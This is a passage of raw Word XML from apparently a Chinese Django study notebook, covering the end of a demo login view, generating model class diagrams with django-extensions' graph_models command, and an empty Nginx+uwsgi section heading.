    <w:p w14:paraId="18E6FE42" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">       if user == "runoob" and pwd == "123456":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B4D9C7" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            return HttpResponse("POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6513A326" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">       else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7D1182" w14:textId="3D66CC63" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            return HttpResponse("POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455101A1" w14:textId="77777777" w:rsidR="00CA7AEA" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A6E41C" w14:textId="77766338" w:rsidR="00CA7AEA" w:rsidRDefault="00865D8C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="661" w:name="_Toc159780091"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>models</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绘制类图</w:t>
      </w:r>
      <w:bookmarkEnd w:id="661"/>
    </w:p>
    <w:p w14:paraId="4C4799A4" w14:textId="77777777" w:rsidR="00865D8C" w:rsidRDefault="00865D8C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74769FFC" w14:textId="0F1F5F52" w:rsidR="00865D8C" w:rsidRDefault="00865D8C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12806240" w14:textId="6D9A7D11" w:rsidR="00865D8C" w:rsidRDefault="00865D8C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId171" w:history="1">
        <w:r w:rsidRPr="002D3F84">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/questions/71144974/using-django-extensions-to-generate-a-model-graph-in-png-format-using-windows-10</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C175BE9" w14:textId="77777777" w:rsidR="00865D8C" w:rsidRDefault="00865D8C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567460B4" w14:textId="55877594" w:rsidR="00865D8C" w:rsidRPr="00865D8C" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A10CF8">
        <w:t>pip install django-extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B37A3BE" w14:textId="143CFB2B" w:rsidR="00865D8C" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A10CF8">
        <w:t>pip install pyparsing pydot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3809EFFD" w14:textId="0FA82D84" w:rsidR="00865D8C" w:rsidRPr="0018241F" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>pip install pygraphviz #</w:t>
      </w:r>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>这个库没用了，直接忽略，不安装他，肯定报错，上面几个库就能替代</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2F5EA1" w14:textId="77777777" w:rsidR="00865D8C" w:rsidRDefault="00865D8C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02576FF4" w14:textId="70E940BC" w:rsidR="00865D8C" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setting</w:t>
      </w:r>
      <w:r>
        <w:t>s.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中配置：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FE9CB0" w14:textId="77777777" w:rsidR="00A10CF8" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>INSTALLED_APPS = (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CDCE19" w14:textId="77777777" w:rsidR="00A10CF8" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C687DD6" w14:textId="77777777" w:rsidR="00A10CF8" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    'django_extensions',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB02BAC" w14:textId="77777777" w:rsidR="00A10CF8" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E56FAF9" w14:textId="4488306A" w:rsidR="00A10CF8" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BF3BCC" w14:textId="77777777" w:rsidR="00A10CF8" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19E2FC08" w14:textId="166D664E" w:rsidR="00A10CF8" w:rsidRPr="0018241F" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后运行命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python manage.py graph_models -a -o myapp_models.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524A70C9" w14:textId="2651A3E2" w:rsidR="00A10CF8" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下会出现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.dot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的类图图片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3179DB" w14:textId="77777777" w:rsidR="00A10CF8" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71B0364B" w14:textId="77777777" w:rsidR="0018241F" w:rsidRPr="0018241F" w:rsidRDefault="0018241F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">graph_models: </w:t>
      </w:r>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>这是要运行的管理命令。它是由</w:t>
      </w:r>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>django-extensions</w:t>
      </w:r>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>提供的一个命令，允许你生成应用程序模型的类图。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101FD53C" w14:textId="77777777" w:rsidR="0018241F" w:rsidRPr="0018241F" w:rsidRDefault="0018241F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3044072F" w14:textId="77777777" w:rsidR="0018241F" w:rsidRPr="0018241F" w:rsidRDefault="0018241F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">-a: </w:t>
      </w:r>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>这是一个选项，表示生成所有应用程序的模型类图。如果你只想生成特定应用程序的模型类图，可以提供应用程序名称，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>myapp</w:t>
      </w:r>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>，而不是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>-a</w:t>
      </w:r>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>选项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD46C3E" w14:textId="77777777" w:rsidR="0018241F" w:rsidRPr="0018241F" w:rsidRDefault="0018241F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DEEB8EA" w14:textId="3C495C04" w:rsidR="0018241F" w:rsidRDefault="0018241F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">-o myapp_models.png: </w:t>
      </w:r>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>这是另一个选项，表示输出文件的名称。在这种情况下，生成的类图将保存为</w:t>
      </w:r>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>myapp_models.png</w:t>
      </w:r>
      <w:r w:rsidRPr="0018241F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>文件。你可以根据需要更改输出文件的名称和格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C7B4CA" w14:textId="77777777" w:rsidR="0018241F" w:rsidRDefault="0018241F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0855ABC9" w14:textId="745B9C19" w:rsidR="00A10CF8" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如我生成的考试系统：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3453C733" w14:textId="5B1443BC" w:rsidR="00A10CF8" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="310302DC" wp14:editId="68258D8E">
            <wp:extent cx="5274310" cy="1540510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="1175982978"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82978" name="图片 1" descr="图示&#10;&#10;描述已自动生成"/>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310" cy="1540510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A06E53F" w14:textId="77777777" w:rsidR="00A10CF8" w:rsidRPr="00C05D72" w:rsidRDefault="00A10CF8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E41BA9E" w14:textId="395D04EE" w:rsidR="00917C6F" w:rsidRDefault="00CA7AEA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="662" w:name="_Toc159780092"/>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Django Nginx+uwsgi </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7AEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装配置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="662"/>
    </w:p>
    <w:p w14:paraId="4AA11F4E" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223AE05C" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47BDE7E9" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B76C237" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76059962" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FDA49E6" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0451DBCB" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5369A90D" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17873B4E" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRPr="00C05D72" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39FAE22C" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C38CB8" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30FA6DC6" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1252133C" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71B89127" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A57363" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76487E4B" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56220193" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A347D4" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="200791A5" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRPr="00C05D72" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6B23B5" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7245BC81" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="785D9453" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="391030E9" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D311EC1" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2075B03A" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF659F0" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE54738" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEA12EC" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE4D0EF" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRPr="00C05D72" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47303B90" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2069DBE1" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1825150B" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A4F35A" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1018B1EB" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6E3F44" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067DE4B4" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26BB8E6E" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0453DEEB" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209B7F64" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRPr="00C05D72" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0872E4A4" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ABA1BBB" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C69899" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD8D9E2" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="732B84B2" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="678E9972" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64A1A31F" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FBCE01" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="021ACBDE" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="590BAC69" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRPr="00C05D72" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE20ACB" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC4E5A4" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
